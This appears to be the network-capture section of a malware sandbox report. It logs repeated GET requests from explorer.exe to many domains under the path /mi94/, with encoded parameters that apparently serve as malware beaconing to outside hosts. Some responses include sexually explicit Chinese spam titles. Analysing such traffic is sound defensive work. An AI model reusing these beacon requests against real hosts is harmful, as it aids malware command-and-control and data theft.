Apr 11, 2023 09:55:22.417404890 CEST	639	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 11 Apr 2023 07:55:19 GMT Content-Type: text/html Content-Length: 2253 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 bf bd ad cf b2 d8 bf ca d0 b3 a1 d3 aa cf fa d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 32 35 37 34 35 3b 26 23 32 34 33 32 30 3b 26 23 32 38 37 34 38 3b 26 23 32 38 33 38 35 3b 26 23 32 37 39 38 37 3b 26 23 32 37 39 37 34 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人妻激情偷爽文,娇嫩粗大撑开灌满浓浆np</title><meta name="keywords" content="数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人&
Apr 11, 2023 09:55:22.417486906 CEST	640	IN	Data Raw: 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 Data Ascii: #22971;激情偷爽文,娇嫩粗大撑开灌满浓浆np" /><meta name="description" content="数学课代表趴下&#35753

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49849	185.53.179.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:49:31.904742002 CEST	495	OUT	GET /mi94/?_N6l56=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&3fK0g=JxoL4 HTTP/1.1 Host: www.credit-cards-54889.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:49:31.924421072 CEST	495	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 11 Apr 2023 07:49:31 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49850	204.11.56.48	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:49:52.595052958 CEST	496	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=LeCW5t9GBpp13S/smyYBZwUJrQK0nALdrBEabX8clafx5ylIWBgD8qg00KMKKouA0nKe HTTP/1.1 Host: www.jewelry2adore.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:49:52.939524889 CEST	496	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=LeCW5t9GBpp13S/smyYBZwUJrQK0nALdrBEabX8clafx5ylIWBgD8qg00KMKKouA0nKe HTTP/1.1 Host: www.jewelry2adore.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:49:53.813477993 CEST	497	IN	HTTP/1.1 200 OK Date: Tue, 11 Apr 2023 07:49:53 GMT Server: Apache Set-Cookie: vsid=921vr428744993623153038; expires=Sun, 09-Apr-2028 07:49:53 GMT; Max-Age=157680000; path=/; domain=www.jewelry2adore.biz; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_fCiIRzgZ3CsMSiLnnZyfULGa7HelneNLwOfD5A6h4v5c9kwRLTUWv7G7B1jHmRGwyEL+iw3TR0w9jmPri5eKHg== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close
Apr 11, 2023 09:49:53.813597918 CEST	497	IN	Data Raw: 34 34 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c Data Ascii: 4457<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.jewelry2adore.biz/px.js?ch=1"></scri
Apr 11, 2023 09:49:53.813713074 CEST	499	IN	Data Raw: 49 62 54 41 35 4b 31 68 31 51 31 52 6c 53 6e 46 71 4d 55 59 77 55 45 4a 31 62 56 46 51 57 6e 70 55 5a 56 4a 46 54 55 39 35 4d 56 70 6b 65 57 35 6f 63 47 59 35 53 54 6c 76 4e 55 68 55 61 6a 63 77 53 47 46 6a 63 6b 39 57 59 57 56 31 63 31 42 77 61 Data Ascii: IbTA5K1h1Q1RlSnFqMUYwUEJ1bVFQWnpUZVJFTU95MVpkeW5ocGY5STlvNUhUajcwSGFjck9WYWV1c1BwakdscEh2NVNHOWc=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script>
Apr 11, 2023 09:49:53.813807964 CEST	500	IN	Data Raw: 6f 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 Data Ascii: otf") format("opentype"),url("http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular") format("svg");font-weight: normal;font-style: normal;font-display: swap;}@font-face {font-family: "montserrat
Apr 11, 2023 09:49:53.813900948 CEST	501	IN	Data Raw: 67 68 74 3a 30 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 63 6c Data Ascii: ght:0}.clearfix:after{visibility:hidden;display:block;font-size:0;content:" ";clear: both;height:0}* html .clearfix{zoom:1}*:first-child+html .clearfix{zoom:1}a{text-decoration:none}input{outline:none}body{-webkit-text-size-adjus
Apr 11, 2023 09:49:53.814003944 CEST	503	IN	Data Raw: 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 7d 0d 0a 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 75 6c 2e 66 69 Data Ascii: font-family: Verdana,arial,sans-serif;font-weight: 700}.popular-searches ul.first li:hover{background-color: #e09a00;border: solid 4px #fff}.popular-searches ul.first li:hover a{text-decoration: none}input:-webkit-autofill { -we
Apr 11, 2023 09:49:53.814107895 CEST	504	IN	Data Raw: 68 74 3a 20 32 38 70 78 3b 20 6f 75 74 6c 69 6e 65 3a 20 6d 65 64 69 75 6d 20 6e 6f 6e 65 3b 20 77 69 64 74 68 3a 20 32 38 70 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 Data Ascii: ht: 28px; outline: medium none; width: 28px;-webkit-appearance:none;-webkit-border-radius:0;-moz-border-radius:0;border-radius:0;text-transform: uppercase}*/.custom-msg {text-align: center;background-color: #181c55;padding: 5px;color: #fff
Apr 11, 2023 09:49:53.814207077 CEST	505	IN	Data Raw: 65 67 2c 20 72 67 62 61 28 31 34 2c 32 32 2c 34 36 2c 31 29 20 30 25 2c 20 72 67 62 61 28 31 34 2c 32 32 2c 34 36 2c 31 29 20 31 30 30 25 29 3b 7d 0d 0a 20 20 20 20 2e 77 65 62 73 69 74 65 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b Data Ascii: eg, rgba(14,22,46,1) 0%, rgba(14,22,46,1) 100%);} .website a{font-size: 20px;margin: 15px 0;} .main-container{width: auto !important;} #main{padding-bottom: 10px;background: #fff;} .popular-searches{padding:20px 0 0;width:
Apr 11, 2023 09:49:53.814311981 CEST	507	IN	Data Raw: 69 6e 3a 20 30 20 61 75 74 6f 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 20 7d 2a 2f 0d 0a 2e 74 72 61 64 65 6d 61 72 6b 2d 66 6f 6f 74 74 78 74 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 66 66 66 66 Data Ascii: in: 0 auto; float: left; text-align: left; }*/.trademark-foottxt a {color: #ffffff; font-size: 13px; line-height: 28px; }.trademark-foottxt a:hover{text-decoration: underline}@media only screen and (max-width:768px) { #trademark-f
Apr 11, 2023 09:49:53.814419985 CEST	508	IN	Data Raw: 61 6e 6e 65 6c 69 64 3d 50 31 33 43 31 30 30 53 33 30 30 4e 30 42 33 41 31 44 30 45 30 30 30 30 56 31 30 30 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 20 63 Data Ascii: annelid=P13C100S300N0B3A1D0E0000V100" target="_blank"> <p style="font-size:16px; color: #053292; font-weight:bold;margin:0;padding:10px 6px"> The domain <span style="text-transform: lowercase">jewelry2adore.biz</span> may be for sale. Please c
Apr 11, 2023 09:49:53.814522982 CEST	509	IN	Data Raw: 6f 70 6e 73 6c 66 70 3d 31 26 33 66 4b 30 67 3d 4a 78 6f 4c 34 26 5f 4e 36 6c 35 36 3d 4c 65 43 57 35 74 39 47 42 70 70 31 33 53 25 32 46 73 6d 79 59 42 5a 77 55 4a 72 51 4b 30 6e 41 4c 64 72 42 45 61 62 58 38 63 6c 61 66 78 35 79 6c 49 57 42 67 Data Ascii: opnslfp=1&3fK0g=JxoL4&_N6l56=LeCW5t9GBpp13S%2FsmyYBZwUJrQK0nALdrBEabX8clafx5ylIWBgD8qg00KMKKouA0nKe&&kt=112&&ki=3477850&ktd=0&kld=1061&kp=1" target="_top" onmouseover="changeStatus('Best Mortgage Rates');return true;" onmouseout="changeStatus(

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49852	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:50:13.276426077 CEST	518	OUT	GET /mi94/?_N6l56=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&3fK0g=JxoL4 HTTP/1.1 Host: www.licensescape.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:50:13.287537098 CEST	518	IN	HTTP/1.1 410 Gone Server: openresty Date: Tue, 11 Apr 2023 07:50:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 63 65 6e 73 65 73 63 61 70 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.licensescape.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49854	64.246.164.134	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:50:33.955936909 CEST	526	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23 HTTP/1.1 Host: www.jenniferfalconerrealtor.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:50:34.242472887 CEST	527	IN	HTTP/1.1 302 Found date: Tue, 11 Apr 2023 07:50:34 GMT server: Apache expires: Sat, 26 Jul 1997 05:00:00 GMT cache-control: no-cache, must-revalidate, private pragma: no-cache x-redirect-by: WordPress location: https://moxiworks.com content-length: 0 content-type: text/html; charset=UTF-8 v-backend: dugout13-pr x-varnish: 911345876 age: 0 via: 1.1 varnish (Varnish/6.5) x-app-server: varnish_dugout/dugout-varnish21-pr connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49855	38.163.115.131	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:50:54.919147015 CEST	527	OUT	GET /mi94/?_N6l56=RQIqCfU6yca9MG4/XS5zNeloaytkpqyXcIIi0Y1m1ICwL0CZtYYawds0pYmBK3GbRdzS&3fK0g=JxoL4 HTTP/1.1 Host: www.xqan.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:50:55.119823933 CEST	529	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Tue, 11 Apr 2023 07:51:01 GMT Connection: close Content-Length: 1163 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
Apr 11, 2023 09:50:55.119865894 CEST	529	IN	Data Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: </h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49857	160.121.87.199	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:51:16.188972950 CEST	536	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX HTTP/1.1 Host: www.anjin98.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:51:16.457397938 CEST	537	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 11 Apr 2023 07:51:13 GMT Content-Type: text/html Content-Length: 2253 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d5 bf bd ad cf b2 d8 bf ca d0 b3 a1 d3 aa cf fa d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 